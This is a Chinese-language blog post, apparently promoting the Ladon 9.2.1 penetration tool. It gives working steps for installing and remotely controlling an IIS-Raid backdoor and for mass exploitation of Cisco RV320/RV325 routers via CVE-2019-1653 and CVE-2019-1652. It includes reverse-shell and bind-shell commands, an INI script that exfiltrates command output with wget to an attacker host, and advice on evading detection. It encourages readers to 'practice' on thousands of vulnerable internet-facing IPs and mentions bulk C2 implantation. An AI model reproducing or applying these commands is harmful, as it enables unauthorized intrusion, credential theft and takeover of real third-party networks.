Ladon 9.2.1 Cisco漏洞复现批量GetShell、IIS后门、指纹识别、CMS识别

本文目录

0x01 Ladon联动 IIS-Raid后门  非交互式执行命令(WebShell下用)

0x02 Ladon模块WhatCMS资产探测、指纹识别、SSL证书、Banner

0x03 Ladon子模块SSLinfo识别组织机构、设备版本、CDN、WAF等

0x04 Ladon模块CiscoDump结合CVE-2019-1652未授权GetShell

0x05 Ladon子模块FindIP查找IP段是否在漏洞结果

0x06 Ladon各版本区别

0x07 Ladon千万级扫描能力

Ladon简介

Ladon一款用于大型网络渗透的多线程插件化综合扫描神器，含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell，支持批量A段/B段/C段以及跨网段扫描，支持URL、主机、域名列表扫描，支持国家IP段扫描,可加载指定POC在数百上千万IP中挖掘漏洞。9.2.1版本内置170个功能模块,外部模块25个,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息，漏洞检测包含MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列等，密码爆破13种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等，远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/jspshell),Web指纹识别模块可识别75种（Web应用、中间件、脚本类型、页面类型）等，可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令，EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

Ladon 9.2.1 更新功能

Ladon 9.2.1 2022.9.11[u]PortScan[+]CiscoDump/CVE-2019-1653    CVE-2019-1653 Cisco RV320 RV325 Dump Password[u]WahtCMS     新增识别50+CMS Zimbra Mail、GitLab、Atlassian Confluence、TP-Link TL-WR840N[u]WebScan     更新https tls 1.2[u]gethtml        支持https tls 1.3[u]wget/HttpDownLoad  支持https tls 1.3[u]WebShellCmd      WebShell横向移动[u]SslInfo[u]WPinfo[-]WebDir    移除Web目录扫描模块(若需要请使用旧版)[-]ms16135    移除MS16135提权(CVE-2016-7255)模块[+]FindIP    查找IP列表是否出现指定IP段或IP[+]IISdoor     IIS-Raid后门连接执行命令(后门自行编译https://github.com/0x09AL/IIS-Raid)
LadonEXP 2022.8.28[+]增加随机UserAgent，删除默认google蜘蛛(会被一些站点禁止访问)

0x001 Ladon联动 IIS-Raid后门  

复现环境

2012 R2 X64   IIS8

编译 VS2015  Visual Studio 2015 (v140)

1.编译使用relase，多线程MT，不然可能报503错误

2.打开 服务器管理器，点击"添加角色和功能"。

"Web服务器(IIS)"->"添加功能"->"下一步" 确认：

"安装"即可 过一段时间就完成了。

安装完成后，访问127.0.0.1:80就可以看到IIS的界面

后门安装

把编译好的IIS-Backdoor.dll文件放到任意目录，如C:inetpubwwwroot

添加模块

C:Windowssystem32inetsrvAPPCMD.EXE install module /name:Module  /image:"C:inetpubwwwrootIIS-Backdoor64.dll" /add:true已添加 GLOBAL MODULE 对象“Module”已添加 MODULE 对象“Module”

查看已安装模块

C:Windowssystem32inetsrvAPPCMD.EXE list modules

连接后门(原版py交互式)

python iis_controller.py --url http://192.168.1.142 --password SIMPLEPASS
IIS-RAID #> net user*** Unknown syntax: net userIIS-RAID #> cmd whoami[+] Received output [+]win-k8gegeadministrator

Ladon非交互式连接IIS后门

非交互式方便在WebShell、CS或其它远控上无需代理直接连接内网IIS后门

C:UsersnullDesktopLadon>Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
Ladon 9.2.1Start: 2022-09-11 14:15:27PC Name: TEST Lang: en-USRuntime: .net 2.0  ME: x64 OS: x64OS Name: Microsoft Windows 8.1 EnterpriseMachine Make: VMware, Inc.RunUser: null PR: -IsUserPID: 18560  CurrentProcess: LadonFreeSpace: Disk C: 5578 MB
Load IISRaidiis apppooldefaultapppool

应用场景

任何基于IIS运行的网站，如Exchange、SharePoint等,安装正常的后门对网站功能无任何影响。

注: 64位系统不可使用32位的DLL，不然网站无法访问,一旦注册32位的DLL，命令删除后，还得GUI上删除，不然网站就一直500错误

修改密码 Functions.h 默认SIMPLEPASS

// Communication Header for the Response.
#define COM_HEADER "X-Chrome-Variations"
#define PASS_FILE "C:\Windows\Temp\creds.db"
#define PASSWORD "SIMPLEPASS"

默认密码连接命令

默认是为了方便测试或接管别人使用部署在站点的默认IIS-Raid后门

Ladon IISdoor http://192.168.1.142 whoamiLadon IISdoor http://192.168.1.142 SIMPLEPASS whoami

例子：默认密码 SIMPLEPASS 改成 k8gege520

0x002 Ladon模块WhatCMS资产探测、指纹识别、SSL证书、Banner

无论是内网渗透还是外网渗透，信息收集都非常重要，内网和外网其中一个共性都包含WEB渗透，很多人误以为一些什么IPC横向、域渗透等就是内网渗透，其实内网渗透也一样，当你没有域控权限又没有机器密码时，就不能横向了？其实你可以把内网当成一个小的互联网，这样思路不就开阔了？内网也有Web服务器，比如测试站点、实际环境站点、路由器、打印机等,所以内网渗透也需要web渗透，web渗透就得先探测内网web资产，所以识别WEB应用系统版本、路由器、交换机、打印机、登陆口、管理系统等非常重要。确定目标的WEB应用版本后，根据版本使用对应EXP获取权限，控制路由器进行流量截取、获取打印机数据、控制内网OA系统等，甚至有些个人机管理员或开发人员在自己机器上部署WEB环境，如PhpStudy、Xampp存在漏洞版本，通过对后门或漏洞，我们就可以直接接管个人机，同样达到横向目的，不是只有域控才能控到个人机。如果所处的内网是服务器段，那你整个横向基本上就是得WEB渗透了，所以内网渗透和外网渗透一样，也需要WEB渗透。

Ladon子模块WhatCMS基于HTTP协议WEB特征、SSL证书、Banner、标题识别135+CMS，支持识别国内外常见上百种CMS、设备、防火墙、CDN等，也可智能识别一些未知CMS，9.2.1新增50+CMS识别，包括但不限于以下版本。

指纹识别包括但不限于以下CMS0 Login or Manage1 Discuz2 DeDecms3 phpwind4 phpCMS5 ThinkPHP6 phpMyAdmin7 FCKeditor8 401 Authentication9 Router H3C ER3200G210 KesionCMS11 ActiveMQ12 Tomcat13 Apache14 IIS15 AAWServer16 Struts217 Joomla18 vBulletin19 Drupal20 DotNetNuke21 XenForo22 ColdFusion23 XOOPS24 WebSphere25 Plone26 phpBB27 IP.Board28 PHP-Nuke29 SharePoint30 GlassFish31 Roundcube Webmail32 WebLogic33 PHPnow34 ShopEx35 EmpireCMS36 ECSHOP37 MetInfo38 RIPS39 Tipask40 OElove41 Webmin Webmail42 JBoss43 Nginx44 Solr45 Zabbix46 Jenkins47 ASPMaker48 ACU Explorer49 Webview50 Plesk51 CANON52 SwitchExplorer53 HP iLO54 Switch Admin55 Check Point56 Huawei WebLMT57 WebConsole58 Cisco Systems 59 Cisco Unified IP Phone60 Cisco Unified Contact Center61 Cisco Finesse62 Cisco Prime License Manager63 Apache[RedHat]64 Apache[Debian]65 Apache[Win32]66 WebLogic[Maybe]67 IIS768 403 Page69 404 Page70 Access Denied Page71 Jetty72 Service Unavailable Page73 Eaton System74 Apache Axis275 Apache Flink76 Microsoft Exchange77 TP-Link TL-WDR730078 Juniper VPN79 Juniper80 Apache CentOS81 F5 BIG-IP82 Atlassian83 Serv-U FTP84 GeoServer85 VMware ESXi86 PEPLINK87 GitLab88 Atlassian Confluence89 TP-Link TL-WR840N90 Zimbra Mail91 Atlassian Jira Project Management Software 92 Atlassian Bitbucket Git93 VNPT iOffice94 Hikvision95 YII96 Liferay97 IBM Storwize V5000E Storage Management98 DrayTek Vigor99 Sophos XG Firewall100 TP-Link Archer101 TP-Link Archer VR1210v102 TP-Link Archer VR400103 TP-Link Archer C20104 TP-Link Archer C5105 Huawei HG8145V106 Huawei HG8145X6107 Cisco AnyConnect VPN108 Cisco-CcspCwmpTcpCR/1.0109 Cisco Linksys Smart Wi-Fi110 Cisco RV016111 Cisco RV180W112 Cisco RV180113 Cisco RV120114 Cisco RV120W115 Cisco CVR328W116 FortiGate117 Citrix ANG118 Cloudflare CDN119 (401) Unauthorized120 Citrix120 Citrix XTE/6.0.1121 Sophos121 Sophos XG Firewall122 cisco-IOS123 Cisco NFVIS124 Huawei125 HP LaserJet MFP M426dw126 HP DesignJet Z9 44in127 Lotus Domino128 Virata-EmWeb/R6_2_1129 Apache-Coyote/1.1130 php Page131 jsp Page132 aspx Page133 nsf Page134 cgi Page135 cfm Page

技术指标

1. Web特征
   

2. SSL证书

3. Banner

4. 网页标题
   

5. 多个端口

6. IP、URL
   

WhatCMS通过正常的HTTP请求访问，通过解析目标WEB资产信息特征，识别WEB应用版本，整个过程都是正常流量探测，流量监控上或目标WEB系统日志看不出自己正在被识别，整个过程不会有任何警报。如果FRP代理这种持续向外请求发包的工具你都敢用，Ladon在内网做资产探测就更不怕了。

Ladon https://192.168.1.8 WhatCMS   扫描URLLadon url.txt WhatCMS   批量URL

实战批量识别 Cisco设备 路由器 交换机 VPN

Ladon48 url.txt WhatCMS

Ladon子模块WhatCMS批量识别IP、C段、B段、A段、国家IP段

当提交的参数为IP或IP段时，因为不确定目标IP在哪端口上部署WEB，为了获取较全的资产，但同时考虑到批量探测时间以及针对一个IP的发包量问题，WhatCMS只会对以下一些常见端口进行CMS资产识别，如需识别其它端口，请自己使用url.txt配置其它端口，假设Cisco路由器修改了端口为8888，那么URL里你就填写https://192.168.1.8:8888，或者直接命令Ladon url WhatCMS。

Ladon 192.168.1.8 WhatCMS   扫描IPLadon 192.168.1.8/24 WhatCMS   扫描C段Ladon 192.168.1.8/C WhatCMS   扫描C段Ladon 192.168.1.8/B WhatCMS   扫描B段Ladon 192.168.1.8/A WhatCMS   扫描A段Ladon IP.TXT WhatCMS   扫描IP列表Ladon IP24.TXT WhatCMS   扫描C段列表Ladon IP16.TXT WhatCMS   扫描B段列表Ladon cidr.TXT WhatCMS   扫描整个国家IP段列表禁PING扫描Ladon noping 192.168.1.8 WhatCMS   扫描IPLadon noping 192.168.1.8/24 WhatCMS   扫描C段

代理或低线程扫描

由于你的VPN卡、目标多速卡、代理工具本身问题等，代理过程中可能会丢包，会导致探测不精准，所以需要根据实际情况调低线程，或者说目标对被控机器流量，对同一IP发包请求有限制，比如每秒对网站发起13个请求，视为DDOS攻击，因此拦截指定IP对站点访问，也可以调低线程，当然这种情况一般只在被探测站点对访问它的IP做拦截。而且Ladon识别CMS对不同站点不同应用时间本身就不固定，识别10个特征发现是cisco，识别下一个站它不是思科，它是TPLINK，识别第100个特征才轮到它，加上探测机到目标机的网速原因，这整个过程时间完全是随机的，对工具来说就像人工在操作，如果目标机器性能好，被控机到其它机器时间或识别时间也完全一样，或者你觉得同1秒发包次数多流量非常大，管理中非常牛B，会从正常探测流量轻松抓到你，也可以设置线程扫描的。举个例子，FRP持续发包、NMAP默认扫描大量包，甚至你都敢用全端口扫描，就别说Ladon这种只做精准探测发包量又小的工具，会被管理员发现了，他有这能力，你运行FRP，绝对会被发现。你自己做渗透的，你自己想是向外请求危险，还是内网请求危险，他要检查，也是优先检查对外网有请求的，然后一刀切断。

Ladon https://192.168.1.8 WhatCMS  单个URLLadon 192.168.1.8 WhatCMS  单个IPLadon 192.168.1.8/24 WhatCMS t=1  单线程Ladon 192.168.1.8/24 WhatCMS t=8  8线程

PS：现实中管理员没那么牛B，就算那个牛B的人天天盯着一台电脑看，实际上也不只一个人在日他，百且也不可能有哪个公司牛B到，请一个人只盯着一台机器看，马云都烧不起这个钱。大量日志面前，人家用POC或者漏洞扫描器直接，默认大量POC探测，他就是再牛B，处理起来也有优先级别吧，你的正常流量，他有空来分析才怪了，如果你被发现，绝对是因为别的原因，比如这台机器不只你一个人在操作，别人通过它使用什么WVS等一通乱扫，默认发了几万个包，导致当前机器被管理重装，或者是你的WEBSEHLL或马的请求流量被发现。

Ladon新增部分CMS识别实战效果如下

Cisco NFVIS

Cisco-CcspCwmpTcpCR/1.0

Citrix XTE/6.0.1

Sophos XG Firewall

Lotus Domino

Zimbra Mail

TP-Link TL-WR840N

100 TP-Link Archer
101 TP-Link Archer VR1210v
102 TP-Link Archer VR400
103 TP-Link Archer C20
104 TP-Link Archer C5

Cloudflare CDN

HP LaserJet MFP M426dw

0x003 Ladon子模块SSLinfo识别组织机构、设备版本、CDN、WAF等

通过访问SSL端口获取SSL信息，默认端口为443，探测过程是一个正常ssl的请求服务器，服务器返回证书的过程，因此是不会被WAF、防火墙、EDR、XDR等产品拦截或报警。证书里可能会包含设备版本、组织机构、域名、机器名、路由器、CDN等等信息，当然也相当于变相探测存活主机的方法。使用SSLinfo可查看详细的SSL信息，WhatCMS只提取部分信息。

参考文章 Ladon9.1.7利用SSL证书探测信息

0x004 Ladon模块CiscoDump结合CVE-2019-1652未授权GetShell

通过肉眼或网页源码无法判断思科版本，使用WhatCMS探测获取版，当然也可以参考我前段时间发布的文章“Ladon6种方法探测Cisco设备版本”,如下图探测到目标思科版本为RV320，该版本存在2个漏洞，两漏洞结合可GetShell。

第一个漏洞名称为CVE-2019-1653，漏洞出现在固件版本1.4.2.15和1.4.2.17的路由器上。该漏洞允许未经身份验证的远程攻击者从基于Web端获取敏感信息（包括路由器配置和诊断信息），如Ladon获取相关用户登陆密码。

命令

Ladon https://123.234.456.789 CiscoDump

测试两台 均成功获取   影响版本RV320、RV325

批量检测，发文前检测存在漏洞IP近4000+，大家还是可以拿来练练手的

Ladon url.txt CiscoDump

使用获取的帐号密码登陆后台成功，当然也可尝试登陆SSH或连接VPN

第二个漏洞名称为CVE-2019-1652，是由用户提供的输入的不正确验证引起的命令注入错误。该漏洞影响运行固件版本1.4.2.15到1.4.2.19的路由器，漏洞允许具有管理员权限的远程攻击者以root身份在底层Linux shell上执行任意命令。

授权RCE反弹shell

python exec_cmd.py -t xxx.xxx.xxx.xxx -s -p 443 -U cisco -P cisco -c "cat /etc/passwd | nc you-ip 4444"

HASH传递绑定Shell

python easy_access.py -t xxx.xxx.xxx.xxx -p 443 -s -c "telnetd -l /bin/sh -p 4444"{+} Gonna go grab us a config file...{+} Sending request to https://xxx.xxx.xxx.xxx:443/cgi-bin/config.exp{*} We seem to have found a valid config!{+} Extracting Creds...{+} Got user: Super{+} Got password (hash): fc9bd9ed39fcaf888887749a49cad87{+} Sending request to https://xxx.xxx.xxx.xxx:443/ to extract auth key...{*} Got auth_key value: 1964300002{+} Login Successful, we can proceed!{+} Ok, now to run your command: telnetd -l /bin/sh -p 4444{+} We don't get output so... Yeah. Shits blind.

测试以上两种方法，反弹shell或绑定shell均失败，起初我认为可能个别IP的问题，于是使用Ladon配置INI脚本批量利用，测试几百个也没一个成功的。

于是我使用MSF来打，测试十几个IP，没一个能GetShell。在我多年实战的印象中，MSF的EXP兼容性一般都比较好，但这次让我失望了，看了一下，其实它也就是翻译了PY的EXP，唯一区别在于反弹payload不一样而已。

PS: MSF利用时需要放行8080端口，这是MSF用于反弹的PAYLOAD，还有反弹SHELL时的默认4444端口，开完了，一样失败，显然不是这问题。

猜测可能是反弹的问题，于是尝试换个思路，结合我之前发过的Linux渗透无回显命令执行漏洞回显的文章，稍微改一下EXP脚本，通过Ladon配置INI脚本，我们再不需要把PY翻译重写成.NET模块的情冲下，直接调用EXP对存在漏洞的URL批量getshell。

Ladon监听

使用Ladon内置WEB服务器接收漏洞回显，监听命令如下

Ladon web 800

GetShell.ini

配置INI脚本很简单，比如EXP是PY写的，那么EXE参数就写python，arg即程序启动参数，填写py脚本对应参数，$ip$为Ladon传入的变量

[Ladon]exe=pythonarg=LadonCiscoExp.py -t $ip$ -s -c "wget http://YOU-IP:800/getstr/`id`"

当然我们也可以把INI脚本改成批量植入C2，直接上控

批量GetShell

Ladon ip.txt GetShell.ini

执行后，Ladon接收到很多IP执行ID命令的结果

由于IP太多我们需要把WEB监听的结果重定向保存到txt中

Ladon web 800 > getshell.txt

扫描不到2小时，发现还是有不少收获的，至于还有多少台可以执行命令大家自己测试了。

关于CiscoEXP三年前就收集了一些放在Github上，上一篇文章教大家使用Ladon探测内网Cisco版本时已讲过了，本次更新Ladon批量检测功能，除了方便针对外网5W该型号路由检测外，也方便在内网渗透中使用。

注意：Ladon脚本INI优点是无需编程，支持任意语言编写的EXP，但也有比较明显的缺点，一EXP写得不好时，可能会卡死，二是速度慢。水平更高的人，建议使用.NET编写DLL模块，这样Ladon用起来才会更加丝滑。

0x005  Ladon子模块FindIP查找IP段是否在漏洞结果

为了防止误报，如当IP段为3.456.3，匹配到123.456.3.x结果，实际上3.456.3段上一台机器都没有漏洞。数量小还无所谓，如果匹配的是几百个IP段，结果可能误报说发现几百上千个，这样我们又得人工找一次，为了防止出现如下所示误报，对IP段前面部分进行了完全匹配，如果你的扫描结果中包含http://或https://请先去掉，以免匹配不到。
//Key: 3.456.3.
//Found: 123.456.3.238:443
//Found: 123.456.3.51:443
//Found: 123.456.3.78:443

Ladon FindIP IP段.txt 结果.txt

PS: 123.456.xxx.xxx  IP是乱写的 最大才255哪来的456，真实IP得打码

实战使用效果如下，结果显示搜索的IP段，以及该IP段对应的漏洞IP信息

0x006 Ladon各版本区别

EXE版本:Ladon、Ladon40、Ladon48、LadonGUI、LadonEXP

40、48代表的是.net版本，Ladon少量模块代码未完全使用2.0实现，一般情况下根据目标系统使用即可。Win7、2008默认安装.net 3.5，WIN8、WIN10、Win11、2012、2016、2019、2022系统默认.NET 4.X。不同版本最直接的影响是个别功能使用Ladon.exe无法使用，这些模块在使用时会提示需要.net 4.0运行时，或者功能适用范围少，如SSLinfo、WhatCMS模块对一些HTTPS站点不同exe版本可能无法访问。

使用tls 1.3的部分站点，仅48可探测SSL，40可bannerCMS，20无法探测

使用tls1.11.2的https站点，任意版本Ladon访问均可探测SSL如baidu.com

PS：在安装有.NET 4.8的环境下，访问HTTPS站点，建议使用Ladon48

LadonGUI

主要是给不熟悉Ladon命令的人使用，或者本地使用反弹Shell生成器，文本处理、IP整理、URL整理等批量场景，Powershell混淆、PowerShelll转exe、EXE转PowerShell，五种方法收集子域名、加密解密,搜索文档等

LadonEXP

无需编程能力，可一键生成POC，只需填写相关payload，即可测试或生成http/https提交的EXP，支持GETPOSTMOVEPUTOPTIONS等方法提交，测试正常的POC，可通过Ladon内存批量调用，快速扩展扫描能力。

本次更新移除默认Google蜘蛛UsageAgent，一些站点禁止爬虫，使得默认提交EXP会提示403禁止访问。所以移除增加随机UA，勾选一次RandomUserAgent就会更换一个UA。

Cobalt Strike插件 CS版

Ladon9.1.1插件右键功能已更新174个，相比9.1.0的131个新增了43个功能，本机密码新增4个主流浏览器Chrome、Firefox、Edge、Coccoc帐密、历史记录、Cookie等，新增CMD常用渗透命令30+，Ladon9.1.1插件采用分离式加载，减少网络卡时加载Ladon导致CS假死情况。其它功能，新增.net测试&powershell测试，用于测试目标杀软是否拦截CS加载.NET程序或Powershell等，具体功能大家实战测试吧，实战为王，多说无益。懒得截图了，大家自行测试最新版9.2.1吧，由于改动大，大家要是发现BUG，可以反馈，我有空完善。

加载scripts目录里的cna脚本后，我们的CS就拥有Ladon的超能力,包括不只限于Ladon所拥有的功能，还有超过30+功能是CS版才有的。

参考文章：

巨龙拉冬: 让你的Cobalt Strike变成超级武器

[工具]Ladon 9.1.4 & Cobalt Strike发布

PowerShell版Ladon

Ladon.ps1由LadonGui上的exe->powershell功能将Ladon.exe转换而来,具备Ladon所有功能，那些喜欢所谓无文件渗透的，可以使用该版本，免杀效果也比exe好一些，目前也发现有一些勒索病毒使用Ladon.ps1版本，对网络进行自动化渗透。博客和github后台显示有不少老外翻译访问，所以并不只国人在用，人家也不傻，像我也喜欢用各国的关键字去搜索工具或EXP，当然可能90%的工具都是英文就能搜到，但使用他国语言可能也能搜到好东西。

0x007  Ladon千万级扫描能力

Ladon 192.168.1.8/C WhatCMS   扫描C段 0-255=256 可用254Ladon 192.168.1.8/B WhatCMS   扫描B段 256x256=65536 可用65534Ladon 192.168.1.8/A WhatCMS   扫描A段 256x256x256=16777216 可用16777214 Ladon IP.TXT WhatCMS   扫描IP列表Ladon IP16.TXT WhatCMS   扫描B段列表Ladon cidr.TXT WhatCMS   扫描整个国家IP段列表

支持多格式IP、URL、IP段、国家段扫描，有人可能说Ladon这么小的程序千万级扫描是吹牛夸张?大家自己算一下，一个B段65536个IP，10个B段就是65万，20个B段就是130万，大家只要在ip16.txt里放20个B段这不就轻松百万了，200个B段也是千万，一个A段是256个B段大约1677万个IP，在大型内网中大家都有用Ladon扫过A段的存活或者MS17010吧，百万并不夸张也没吹牛。国家IP段可不只B段，有些仅一个cidr段可能就几十万了，你扫一个cidr.txt列表可能几百上千个cidr，换算成IP可能就是百万千万甚至上亿级别了，只是这个扫描时间较长，写得POC最好不要有BUG或卡死的情况，不然就扫很久,哪怕是控制台输出一个字符，都会影响扫描速度，所以这也是Ladon很多模块只回显成功结果的原因之一，另一个是怕在垃圾M上扫，实时回显太多数据M的CMD崩溃，这是经过实战，各种运行环境下综合考虑的最佳写法，不是什么模块都要把错误密码，错误日志全都打印出来的，非打不可的话，实战就需要重定向，免得webshell，远控shell卡死，无法重定向输出文件的情况下(如写权限或无物理路径原因)，只输出成功结果是最佳方案。

当然以上说的主要用于外网扫描时，针对内网，速度最快，大型的一般也就几个A段，或者几百个C段（这种级别估计都世界500强），中小型的内网机器网段机器规模远比大公司要小，管理员用于检测新出漏洞更是小菜一碟。

PS: 多线程扫描时，编程时不要一下把几十万上百万IP加入线程，我们需要分块，扫完一部份，再扫一部份，这样就不至于加载TXT的时候直接崩溃，或者计算IP时直接把几十万上百万IP加入列表，导致程序直接崩溃，无法扫描。

0x008 十五的月亮十六圆  祝大家中秋快乐!

本文知识点有点多，大家可以边吃月饼慢慢看，若是得对你有帮助，可以点个赞，当然实际上，我比较喜欢大家反馈BUG，这也是公开的主要目的，这样好完善。因为用的人越多，大家实际环境不一样，你遇到的问题，可能下次我也会是遇到，在遇到前先解决了，等我遇到，就不用在上面浪费时间了。

原文始发于微信公众号（K8实验室）：Ladon 9.2.1 Cisco漏洞复现批量GetShell、IIS后门、指纹识别、CMS识别